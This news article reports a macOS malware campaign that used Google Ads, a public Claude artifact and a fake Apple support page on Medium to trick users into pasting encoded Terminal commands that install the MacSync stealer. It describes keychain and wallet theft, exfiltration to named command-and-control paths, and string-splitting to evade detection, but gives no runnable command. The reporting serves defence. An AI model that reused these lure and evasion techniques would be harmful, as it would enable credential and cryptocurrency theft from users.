A recent malware campaign has been exploiting macOS users by infiltrating Google-sponsored search results and leveraging legitimate platforms, such as Anthropic’s Claude AI and Medium. This sophisticated attack has already targeted over 15,000 users through two distinct methods, capitalizing on the users’ trust in well-known online services.
Methods of Attack
The initial attack strategy uses Google Ads to promote a malicious Claude AI artifact, masquerading as a legitimate macOS security guide. This occurs when users search for “Online dns resolver,” leading them to a sponsored link that redirects to a public Claude artifact titled “macOS Secure Command Execution.” This deceptive guide instructs users to paste a base64-encoded command into their Terminal application, which decodes and runs a harmful script designed to download the MacSync information stealer malware.
After execution, the malware connects with its command-and-control server at a2abotnet[.]com/dynamic using predefined authentication credentials. To avoid detection, it disguises its network traffic as normal web browsing by mimicking legitimate macOS browser User-Agent strings. The payload then retrieves an AppleScript component responsible for extracting sensitive data like keychain information, browser data, and cryptocurrency wallet details.
Data Exfiltration Techniques
According to cybersecurity experts at Moonlock Lab, the stolen data is compressed and saved in /tmp/osalogging.zip before being sent to a2abotnet[.]com/gate through HTTP POST requests. The malware incorporates advanced retry strategies for managing large data transfers, including chunked uploads with up to eight retries and exponential backoff. Upon successful data transfer, it deletes the staging files to avoid leaving traces.
The second variant of the attack targets users searching for “macos cli disk space analyzer” through a Medium article hosted at apple-mac-disk-space.medium[.]com. This article pretends to be from Apple’s official Support Team and uses the same ClickFix social engineering technique, albeit with double-layered encoding and a different hosting setup. The malicious command cleverly uses string concatenation (cur””l instead of curl) to evade pattern-based detection systems.
Growing Threats and Precautionary Measures
These attack variants underscore the rising trend of cybercriminals abusing legitimate platforms and trusted services to spread malware. The use of Google Ads in malware distribution emphasizes the crucial need for verifying the authenticity of sources, even when they appear in sponsored search results. MacOS users are strongly advised to refrain from executing terminal commands from unfamiliar sources and to verify the authenticity of support articles claiming to be from Apple or other reputable vendors.
Organizations should deploy endpoint detection solutions capable of monitoring suspicious terminal activity and network connections to unverified command-and-control servers. Staying informed about cybersecurity threats is essential for protection, and users are encouraged to follow updates on reliable platforms.
